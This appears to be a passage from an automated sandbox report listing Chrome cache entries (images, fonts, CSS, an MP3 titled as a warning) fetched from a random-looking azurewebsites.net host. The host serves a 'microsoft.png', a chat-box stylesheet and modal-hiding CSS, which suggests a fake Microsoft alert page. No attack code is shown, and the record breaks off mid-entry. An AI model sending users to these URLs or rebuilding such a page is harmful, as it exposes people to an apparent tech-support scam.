                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/5f205bc497791_v.css
                          Preview:.modal{display:none !important;}..modal-backdrop{display:none !important;}.

                          Chrome Cache Entry: 73

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 16 x 16
                          Category:dropped
                          Size (bytes):234
                          Entropy (8bit):6.110732904818618
                          Encrypted:false
                          SSDEEP:6:Nk6MGMcRWKbljxQuXRlt3rodaJfdSWhMtBn:Mz5KbljxHjUdC3MtB
                          MD5:9CE99EC458DAF212F9812A90F3FADD13
                          SHA1:9E3041BC91B79A17B52E0FBB6C2D0E2F905D98A1
                          SHA-256:B0D335401C9FD5FAC9991EC92EDAF7865FF3A491EBE390120936C69796C3B753
                          SHA-512:D1A4C2279ECAA2CA24515389CC9350FF872537DBC5CFC704F0896A83530D9F60650D979CB4DA826E3A616AD74D21C5F0FC2781D08AB119393061BC49784AF8FD
                          Malicious:false
                          Reputation:low
                          Preview:GIF89a.............ppp...0/1igg...zwzGFI........._\a...UTT...~.............................................!.......,..........g .4.Aa....0..R@..GP.A. .[N........X... @l...i..4...)q`.4V.C.!........(...`...n.~.7..*...............!.;

                          Chrome Cache Entry: 74

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 29 x 29
                          Category:dropped
                          Size (bytes):1245
                          Entropy (8bit):6.967521172091232
                          Encrypted:false
                          SSDEEP:24:uDMal1h6A1aWwjx82lY2T3PQVgbNMhyJ3VS0mNuGY8qsCuhy4:A11LNn2bQkJ3CUL8LCGy4
                          MD5:6D0C71AD95C413318E0946960A597318
                          SHA1:297FA9D7797AFCB90CB49ADB045B673672B360EC
                          SHA-256:F2B1758E4D68018096355641F5E7163B0DF07EFC85E9C3513E51949A75C0446D
                          SHA-512:18150B7CFA4F48E4B646F2AB38952CCACE018E05AAB9318E68E56D5C49641D85442E8AF3D95E4394D0E9D30B295D9E865AB23ED4E7983276E130A3EC859B9D85
                          Malicious:false
                          Reputation:low
                          Preview:GIF89a...............................!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)" xmpMM:InstanceID="xmp.iid:381C5193FCB811EAB7F9F85B546A8F09" xmpMM:DocumentID="xmp.did:381C5194FCB811EAB7F9F85B546A8F09"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:381C5191FCB811EAB7F9F85B546A8F09" stRef:documentID="xmp.did:381C5192FCB811EAB7F9F85B546A8F09"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZY

                          Chrome Cache Entry: 75

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 30 x 29
                          Category:dropped
                          Size (bytes):1509
                          Entropy (8bit):6.930769247274908
                          Encrypted:false
                          SSDEEP:24:GVBvTNal1h6A1aWwjx82lY2T3PQVBsCRsMyJ3Vk7sXe1sVGY8oBG8Jic5w6Mg:kK11LNn2bQjp6J3KB4L8ElcF6X
                          MD5:1834C112F6E54F620D2EF8F8C037D450
                          SHA1:B911B12717FC708C9418B4A2A0D72F79C5C53BE3
                          SHA-256:81A5F62C155D307316D16A11E5A907A99FCFA3F70DCE41D01D9F65518206734E
                          SHA-512:81C0E901120AF3E3A3507A687FA1B89FB42042EFC2B5B929BEEE6CAA2AA6F14AC47DB6AEFED9E7C138E2C354EFB140296C077BD619028C19636A37AD93157D46
                          Malicious:false
                          Reputation:low
                          Preview:GIF89a..... ...............................................................................................................................................................................................!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)" xmpMM:InstanceID="xmp.iid:4D936A4AFCB811EAA6DEABA416F59030" xmpMM:DocumentID="xmp.did:4D936A4BFCB811EAA6DEABA416F59030"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4D936A48FCB811EAA6DEABA416F59030" stRef:documentID="xmp.did:4D936A49FCB811EAA6DEABA416F59030"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

                          Chrome Cache Entry: 76

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Web Open Font Format (Version 2), TrueType, length 66624, version 4.262
                          Category:downloaded
                          Size (bytes):66624
                          Entropy (8bit):7.996443365254666
                          Encrypted:true
                          SSDEEP:1536:P7P0ehdxE792JHJ2qrz+MoCpeUtsG9eDeh9Zw+ZyqJ:PPlYw1re8Lsqh7MqJ
                          MD5:DB812D8A70A4E88E888744C1C9A27E89
                          SHA1:638C652D623280A58144F93E7B552C66D1667A11
                          SHA-256:FF82AEED6B9BB6701696C84D1B223D2E682EB78C89117A438CE6CFEA8C498995
                          SHA-512:17222F02957B3335849E3FE277B17C21C4AAF0C76CD3DA01A4CA39C035629695D29645913865B78E097066492F9CEE5618AF5159560363D2723BED7C3B9CF2A8
                          Malicious:false
                          Reputation:low
                          URL:https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/fonts/fontawesome-webfont.woff2?v=4.5.0
                          Preview:wOF2.......@......*.............................?FFTM.. .`..r........5.6.$........ ..... ?webf.[.....@...nC....t.TL...f...t....q...5....?=i.l..\.vl ..T...b.... .1.f..7.T.Q....D.;:...1.l.jv..e....n..E....k5>.d.7Q.l..Ba....u.x].......W.C....$.8.v#..y`..F..1aM.8.....w.=|'..0..T|..2/..M.%.b.. .tY$!.....5cb.....(.&.-A/mY......./y..o\........Z=.....5c.k._.n3...(W.........Nag+.....O.R.'...5...=?....m...L......:..*._V...........z+zc.1`..Q#j.../.Z0...-..F..i.b.F"2.<EE...;.."u?..........R.Z.HR..D...x.Y,.5.Tt.vb...e..YN..sFND+........1.......`.....D.(.&6baP6(.....X.6gNW.6k..9]..v......$Cf.v.v..x@..-J.`G...w..w[..A.......4.msI>....i.......p..F(2b....~H.]J.]..j....F.f-~.@......gg.B.-..Tx.%..pU.u..me....'........;...@7..t.=pN....../_.U8.....r....s...X=g....H........j..c....d._1l:1i..I..T.r..>.....v{Gb...T1*...f.-.x.-i..{..1..h...>..(..3.3..!.$.:.....j.~....:ugv.......%.....?...d..5+......fU.z...X.X.<.c%@fBHO.8.....i..G...{...[..M#.FZk."_.'.n{.

                          Chrome Cache Entry: 77

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 65 x 80
                          Category:dropped
                          Size (bytes):1547
                          Entropy (8bit):7.632681045615477
                          Encrypted:false
                          SSDEEP:48:SUvJ0W/qmxUwBZpeHEOJDqxnoiGXe0mu4QEGb:bxR/c2ekOJuoXDmuBb
                          MD5:AF52E51F42FD0C55BC3CF2C8ECE71492
                          SHA1:016F83DA68FF461A5C6AEBCC2A45668317B2F24C
                          SHA-256:E91F304CF7409723968740E6363DDA01B50ACB8E94B5CA05B4A4617666FF095C
                          SHA-512:CE74EB35187B0026C344EFBF71F4D4B49B6771BDFDBBB961A60078AA46932D9E2EDE7BDC40DA60E5ADB0C14CA2FD2E607F49EE3E30B3BC9B5225D8039F257229
                          Malicious:false
                          Reputation:low
                          Preview:GIF89aA.P....j................|.....^....p...................................W.....Y.....b..v.....d........!.......,....A.P....`%.di.b....p,...Y..9s...An.3x2....P..8.!........p>....ZC@..J...,....6..G8...../XZORTz)..[SK.}O...p..fOhVrD..u>...ln....g.i0...D...#X.O...(.....%|P...$...D...1.l....s..>..CB...J..P....V..Dz...........p.V...7.,..@..$.l..0.!.....8.@.3.$...&.....(.......f.P.1......X. .#....y.e.@A.Pz8..Z.'<D......]..X@0.....n.Hs.B..KG.. ....Od,...@...R..Q..80$.q.D.E..h.I.c..".Bp......$..K"C..".X....b.]q..UV.:..GP.......5@.p........*...|..QT..........#... .,..3...D.).....B.... _...y}Q].......q....EL.:_D....a..' 6BY{. U..$...M$t..q....p%t..d..d.$`.Y&.(.L...9.uH..'.V.a.....&(2.......B.'V.%\...B.X....CBt.......X!]3.. .8...S. ...D.ip.&......P@..xc...x..|..g.9.P........$...R-......h...0..2.....!.F. .v...*.%d0.j@..nR.4.(3Rx....g....@.c8Hp..&.U..&.."..`.c.9..g.Z.h....^Y.j_......4E... ..#.b...V.Q.".r....@.,.VP...L.,.. ...D.o~"...."D.k..yhA...F..... .Q^.........E.....

                          Chrome Cache Entry: 78

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 80 x 65
                          Category:dropped
                          Size (bytes):1506
                          Entropy (8bit):7.148565966075018
                          Encrypted:false
                          SSDEEP:24:+hxal1h6A1aWwjx82lY2T3PQVotc04Cc0ayJ3VMc0Qc4c0fGY8Ejidvl+Kx9fMp:+411LNn2bQMhPJ3KeZlL88avl+Ksp
                          MD5:0D3C4EFABB6072EC3312574009BE3EF8
                          SHA1:02D319A4E46538BCADCC5122883E1A0C3E94C123
                          SHA-256:45A676A0EB476E7706E0187D975B612F51F3BB4C26596F991D55F5E68FBEF3E3
                          SHA-512:A8DA194E654AE533863744A6C5CDC4FB95FB27E00F294AC403EFB846637B9070DE448C7C1BBB670DDEFA6958A1BC68419350FE530D887486405832DF245BBD33
                          Malicious:false
                          Reputation:low
                          Preview:GIF89aP.A.......=........9.....yn.....f.G........M=......|.=!.............................................!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)" xmpMM:InstanceID="xmp.iid:DF47859C041B11EB821AA74C809F9EB3" xmpMM:DocumentID="xmp.did:DF47859D041B11EB821AA74C809F9EB3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DF47859A041B11EB821AA74C809F9EB3" stRef:documentID="xmp.did:DF47859B041B11EB821AA74C809F9EB3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>................................................................................................

                          Chrome Cache Entry: 79

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 16 x 16
                          Category:downloaded
                          Size (bytes):377
                          Entropy (8bit):5.5857056155757725
                          Encrypted:false
                          SSDEEP:6:NKmsbf/lUvPnklwXENt6F1QVelWkQ9j+mhnnlFzMcI9ocF:PsL9UvPTXIU1QVewkm+mhnnlBvI9ocF
                          MD5:C10BDEC858CB0CF9E6CC5865D5925746
                          SHA1:697C095ED5509E5A5AF0C5EBF2380662AEFFC531
                          SHA-256:B65B47A79E32335D9CA35FF59C6975D2B5808F84DA0DB88D11CE777B33E72AD9
                          SHA-512:7F07C1EDF29CBC427E655B5D3FBBD123228275C55F49EF4E5C0FC1A987F4093C4736FD2DBF03C873630C4FF983D4CA8090D8785D05D7B15B638AE55165984FAC
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/5f205bc2379ac_v.gif
                          Preview:GIF89a................0/1...GFI......~.........igg..........UTT..........ppp...zwz..._\a...............................................................................................................!.......,.............p.A ...c1l:..."S(....@..l...V..<..E..ib....P.X.L..r.D....................w...........b...Q.......B...Bd......B.........Y..B........B....C... B....BA.;

                          Chrome Cache Entry: 80

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:downloaded
                          Size (bytes):25059
                          Entropy (8bit):4.807325431571022
                          Encrypted:false
                          SSDEEP:192:WT3LMhXQSzqmSzqtrJ0lCeyDC5FCxsSzqmSzqQnxUlXSzqmSzqom227d50K9sbVO:jxioD1iCQi0d50FoIpdFM
                          MD5:AB25AE70934938FC98D32C689A466FFF
                          SHA1:70BC9AB476054AC02A90C6385D39208FE36176EE
                          SHA-256:5DBD53E6BF5CDCA3C1BD27D7621E939EB9C0B5387C62FEA84DEB2CAB9A4663E7
                          SHA-512:622F49E0F0B05EE53DD0B54C4F0AB98364CA198AD3B16952B75E6D4A7AFDBCC71B50DE51118F5E667D14B2D502F5C8EB987CDCC8DFEE17A06E23C27EB5300EA9
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/5f205bb74a5eb_v.css
                          Preview: @import url('https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&amp;display=swap');..body{.. font-family: 'Poppins', sans-serif !important;..}..#chat-box{.. background-color: #fff;.. padding: 15px;.. position: fixed;.. bottom: 21px;.. right: 13px;.. z-index: 99999999;.. border-radius: 10px;.. display: none;..}..#chat-box img{.. color: #000;.. font-size: 16px;.. font-weight: 600;.. margin-left: 35px;.. width: 25px;..}..#chat-box h4{.. width: 217px;.. font-size: 20px;.. text-align: center;.. padding-top: 7px;.. margin: 0px auto;.. display: block;..}..#chat-box a{.. text-align: center;.. margin: 0px auto;.. display: block;..}..#chat-box p {.. font-size: 16px;.. text-align: center;.. padding-top: 7px;.. font-weight: normal;..}..#chat-box .arrow-down{.. position: absolute;..

                          Chrome Cache Entry: 81

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 12 x 12, 8-bit/color RGBA, non-interlaced
                          Category:downloaded
                          Size (bytes):945
                          Entropy (8bit):5.912220301858543
                          Encrypted:false
                          SSDEEP:24:+Q1h6A1aWwjx82lY2T3PQVaYbLyJ3VQbqG1Dpl:+u11LNn2bQQtJ3DOl
                          MD5:E6EB3D938F3EBEBD85C71307B38A3BF3
                          SHA1:387223165F8E86F861A09ADB1E3C10A8F2EC7006
                          SHA-256:2B6C8E23B2A2C49AC71393CB3E1740B7E2FCCAA310EE06B68CA27B693D133F8E
                          SHA-512:20941396D66F8EDDE21695D250D01B9240FF9695CD80E4A578F1C4A97D2B061B5C76F5CC1C9C76AB820FA5C89D070FB2B14600627A1F06C2CDB1C28CFF56C65B
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/minus.png
                          Preview:.PNG........IHDR.............Vu\.....tEXtSoftware.Adobe ImageReadyq.e<...#iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)" xmpMM:InstanceID="xmp.iid:03D886B0FD9211EAAC6AC1595738B2FE" xmpMM:DocumentID="xmp.did:03D886B1FD9211EAAC6AC1595738B2FE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:03D886AEFD9211EAAC6AC1595738B2FE" stRef:documentID="xmp.did:03D886AFFD9211EAAC6AC1595738B2FE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>^!.....$IDATx.b...?.)...D0.5.........#1X.......G.{......IEND.B`.

                          Chrome Cache Entry: 82

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 13 x 13, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):349
                          Entropy (8bit):7.047569859646336
                          Encrypted:false
                          SSDEEP:6:6v/lhPfnY+7nDsphbAX6jNYCIh61Uw49/J3BYwmPYYSU+59AyROJwWgZPOIwCMR9:6v/74+U3AANXIsUDdI3+XtRZPONCMROO
                          MD5:7454C652E0733D92DE6C920C2D646AE0
                          SHA1:34A5BD8C7401F95E346895B0E5CCFFBF0E9AD638
                          SHA-256:44F752B0BD2E48052D538BC6ACA5379F3630CA64DA945F794690DDF47E8EAEF7
                          SHA-512:DDE6D40BEC105003CB93C52DD3322C26985FECC7FF1EAB79547FB7F0365AB2FB7B1CBA96AED81958C08627FC6C0BA6034BCEC53B1B66705D7B04202E7F8B5B59
                          Malicious:false
                          Reputation:low
                          Preview:.PNG........IHDR...............s+....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.Q1.E@.e..jQ..3hTJ.J......$J..h)$B).t$._.&....).x....y.w...uu]7.......8..(.e.3MS.e.H.0.#."....Q...QU5.C.@.<...$.Bx..x.8.m.n..'r .}.....x.8..i.q.-........0..9O.A...............a.O..{.W..<......1V..0.O.....I..`.!L.....i....6.B#....~....p..Nq.....IEND.B`.

                          Chrome Cache Entry: 83

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 56 kbps, 44.1 kHz, Monaural
                          Category:downloaded
                          Size (bytes):8405
                          Entropy (8bit):6.704045838496729
                          Encrypted:false
                          SSDEEP:192:aXnUfcyMlDiVE9UQuKCCy6BAtdHtv8/okoR4X:WUfcVlDiVFKByZtdHwCE
                          MD5:8618FBB0911E3B8FC96725DEE8BFD81F
                          SHA1:1BBCB78922946D0CF18FBF3A9E092E36453EB767
                          SHA-256:0589BE7715D2320E559EAE6BD26F3528E97450C70293DA2E1E8CE45F77F99AB1
                          SHA-512:5446BA0132541BE0100F0CE418A4349C2ED6181FD9816D6C30B213E4E773CE6BD979789C422CFAECE228B296B79A0F4F36B97BDA8117A09F84416662A4513A55
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/0wa0rni0ng0.mp3:2f77d16b748046:0
                          Preview:ID3......?TPE1.......SoundJay.com Sound Effects.TSSE.......Lavf54.29.104...@..................Info.......'.. ............%%,,,22888???EELLLRRYYY__eeelllrryyy.....................................................Lavf54.29.104........$.........................P..........!/.RD......j..t.j..t.j..t.j..t.j..t.j..t.j..t.j.....%J....%J....%J...........E..@.?...y.........n...................x>|.@s.......M........E........A......B..........@.f.......s.....R.7..$......f...9@....m.m....@........ ..L... .)x......b.fe...D........ 0..M.M..Ba]..c.."....Ay.Z..h.....U'......}...............@....... 0M....g!....SX.(...G].:....$..^".. ..,d.$.Y..'..,...3Q.K.S3...R. ..).C=....1h}.5..u.p(\..E....&.....<.$...I!0c._F...{.f#...&...=..P.,..*..R.g.j.E...bjuo.....@....D...a......#\%...t.'.......u.......o.Z...(X.r...Dv....J....&..u.....Mn.......)WY...d..*......:.&.Z..R.....O..p.l=....!...dN.:..H.'C...I.9.ME.F...@'..j.?...#.kq.d..gq`..[....Yt.F......?e2..X.....cK...,;...7....2

                          Chrome Cache Entry: 84

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 47 x 46, 8-bit/color RGBA, non-interlaced
                          Category:downloaded
                          Size (bytes):1045
                          Entropy (8bit):6.248239976068452
                          Encrypted:false
                          SSDEEP:24:A1h6A1aWwjx82lY2T3PQVvmdN2yJ3V5L75Gs5eq46col:e11LNn2bQpEbJ3fH5ThOol
                          MD5:BF2B460590FBB9D8E9611A6E9006B816
                          SHA1:561E1DAB259D61E798B3CE380527B71B61074FF3
                          SHA-256:EE4BC5FE81FA7C1E8497D79C9C8A96485DF217092D334E9B48FA8840FED11D03
                          SHA-512:ACC9773B532BFF6A1284B78324D9BD51117A6EBFC0C549224BA4B703540DE8869AB1EFF1CCE8CC4FCA00C5B4F47D34FC27FAB27246873326CEE49D2DD5E877C0
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/microsoft.png
                          Preview:.PNG........IHDR.../..........{@.....tEXtSoftware.Adobe ImageReadyq.e<...#iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)" xmpMM:InstanceID="xmp.iid:2413D6EDFC2911EA865EEF9650A38354" xmpMM:DocumentID="xmp.did:2413D6EEFC2911EA865EEF9650A38354"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2413D6EBFC2911EA865EEF9650A38354" stRef:documentID="xmp.did:2413D6ECFC2911EA865EEF9650A38354"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx.....0......b..".#............N$..B2.U..inw.8p.^g......i......e...x.......<x......J.........[.._....C..

                          Chrome Cache Entry: 85

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (27303)
                          Category:downloaded
                          Size (bytes):27466
                          Entropy (8bit):4.752060795123139
                          Encrypted:false
                          SSDEEP:384:Qi5yWeTUKW+KlkJ5de2UYmydfwYUas8l8yQ/8c:Dlr+Klk3YlKfwYUf8l8yQ/T
                          MD5:4FBD15CB6047AF93373F4F895639C8BF
                          SHA1:12D6861075DE8E293265FF6FF03B1F3ADCB44C76
                          SHA-256:DDD92F10AD162C7449EFF0ACAF40598C05B1111739587EDB75E5326B6697C5D5
                          SHA-512:F8BE32CBA15170319B5C9F663C6F0C4FFDD4083CF047D80F7B214D302B489ECA25FBEE66DDB9366D758A7598EFC9B9A886B02C9F751AE71F207CB9DB1356243A
                          Malicious:false
                          Reputation:low
                          URL:https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css
                          Preview:/*!. * Font Awesome 4.5.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.5.0');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.5.0') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.5.0') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.5.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.5.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.5.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.

                          Chrome Cache Entry: 86

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 12 x 12, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):364
                          Entropy (8bit):7.161449027375991
                          Encrypted:false
                          SSDEEP:6:6v/lhPkd5nDsLiRa6NhNj1aUIXtYRJiTDc7VkC0hWQpPBPFLsfd9EZXlo1p:6v/7yOLiRa6NzJJyusykCmpBFLoGi
                          MD5:E144C3378090087C8CE129A30CB6CB4E
                          SHA1:59DA5466551DE941D0215E45C54AA2CEAF436BE1
                          SHA-256:B13A03E0DB893734298CBE203BF264407636FFE5DAB0A141F83C492D0034DD6A
                          SHA-512:3004885B1DCC8C8544024F3C1345B80AB6B50759F290A3545BFA4ED7EA93426E838B7A04556294298BAD1C6198431FBDE06E999628E45DE10119DD1D4FABE32A
                          Malicious:false
                          Reputation:low
                          Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<....IDATx.\...E@.....TB...-n$...(....5T.7.x.=ZQ...l(n#....WL....N..rY..WY.%I..0.UU/N....|.,K...)...mEQ,.b].p.....8.u]..<....'...ih.....8`.8.........eY..^.o=..........4M..EQ?.B...a.v...q.e..A.^.W.E.4......e.}......+.0........+......m.TI|...3MS0.,{.wq.w.$.>|....0.u.{........IEND.B`.

                          Chrome Cache Entry: 87

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 16 x 16
                          Category:downloaded
                          Size (bytes):234
                          Entropy (8bit):6.110732904818618
                          Encrypted:false
                          SSDEEP:6:Nk6MGMcRWKbljxQuXRlt3rodaJfdSWhMtBn:Mz5KbljxHjUdC3MtB
                          MD5:9CE99EC458DAF212F9812A90F3FADD13
                          SHA1:9E3041BC91B79A17B52E0FBB6C2D0E2F905D98A1
                          SHA-256:B0D335401C9FD5FAC9991EC92EDAF7865FF3A491EBE390120936C69796C3B753
                          SHA-512:D1A4C2279ECAA2CA24515389CC9350FF872537DBC5CFC704F0896A83530D9F60650D979CB4DA826E3A616AD74D21C5F0FC2781D08AB119393061BC49784AF8FD
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/5f205bc2c1b4b_v.gif
                          Preview:GIF89a.............ppp...0/1igg...zwzGFI........._\a...UTT...~.............................................!.......,..........g .4.Aa....0..R@..GP.A. .[N........X... @l...i..4...)q`.4V.C.!........(...`...n.~.7..*...............!.;

                          Chrome Cache Entry: 88

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Web Open Font Format (Version 2), TrueType, length 7840, version 1.0
                          Category:downloaded
                          Size (bytes):7840
                          Entropy (8bit):7.967369628682015
                          Encrypted:false
                          SSDEEP:192:S5upwnqrBHPLA3J73KAQDPh50uFdXrnpjDS7LjvQnRb:S5ELrBvLA3J76AIPhi+vXwzQnRb
                          MD5:8D91EC1CA2D8B56640A47117E313A3E9
                          SHA1:A9E9BAFE64666F4595051A0E895B47A5FA39E67E
                          SHA-256:78BC3AA78FAEC288BBB3BF26C9A0FA4EB67B1E69DA94A17233C5CAB60525EFDB
                          SHA-512:BD3A864BD45F39EE83EE79BA4469A156AD8FF3DD33D8AAE11E3EDD97B29C2EF7F610AC851726041251E34B0108F618A2F945038BF6C0DE9A7982E0D643CDFCFB
                          Malicious:false
                          Reputation:low
                          URL:https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLDz8Z1xlFQ.woff2
                          Preview:wOF2..............?....M.............................`..T....h..6..6.$..h. ..B.....2EF.....d+.U......t........F.h!....9e..'..\Wf[..feB......t...V3.d..?B.S.D..d..=.bKB........p..G.bI.z...5.<.'.D.U,D..3.....^...m..\Z5....-....O.....V.ko.....*.e./".........p.d.......2.4...o..P'.h.\..2VAX}.8.....N5.[...3.>....So.eb......#jZm6....>.% ....,[......+.~..Z..;..'.._....6/.o.-..B...pw)Y.*.X.VT4..ES.L..,S..t:'.t.....ex<..[........Al6..a....#...Q._...k..J8}Vo....9..Mzh.&...p$.a.a..e\.M..3u.....*N................H........}..E..^..cd.).K.G=.'...<.l.....S......%.....$.IL.I.....y.....3-...I..Tq.>?...m...{..w.....+........_..<H..}jA^t.?..>........W.0:= .D.$C.)m...^....Q.)8...x...i..'.A(..@r>.[..-....\..~..{...:......|.W...|.Z.o...)v!(&.....I../?8..jX.........2.gc...$)..v..Ph)".........W.].....\.]SdLox....#.k.y.;.....a(.-...7..G..j...{U.4...T....X....#L..y..VR..#.Hc..a..M.LZ.J\.E.....T^.+q.!.lo.....V.....>7F.t.)..Q.....VJe..~cF.....+.u..JX8e....p........

                          Chrome Cache Entry: 89

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 30 x 29
                          Category:downloaded
                          Size (bytes):1509
                          Entropy (8bit):6.930769247274908
                          Encrypted:false
                          SSDEEP:24:GVBvTNal1h6A1aWwjx82lY2T3PQVBsCRsMyJ3Vk7sXe1sVGY8oBG8Jic5w6Mg:kK11LNn2bQjp6J3KB4L8ElcF6X
                          MD5:1834C112F6E54F620D2EF8F8C037D450
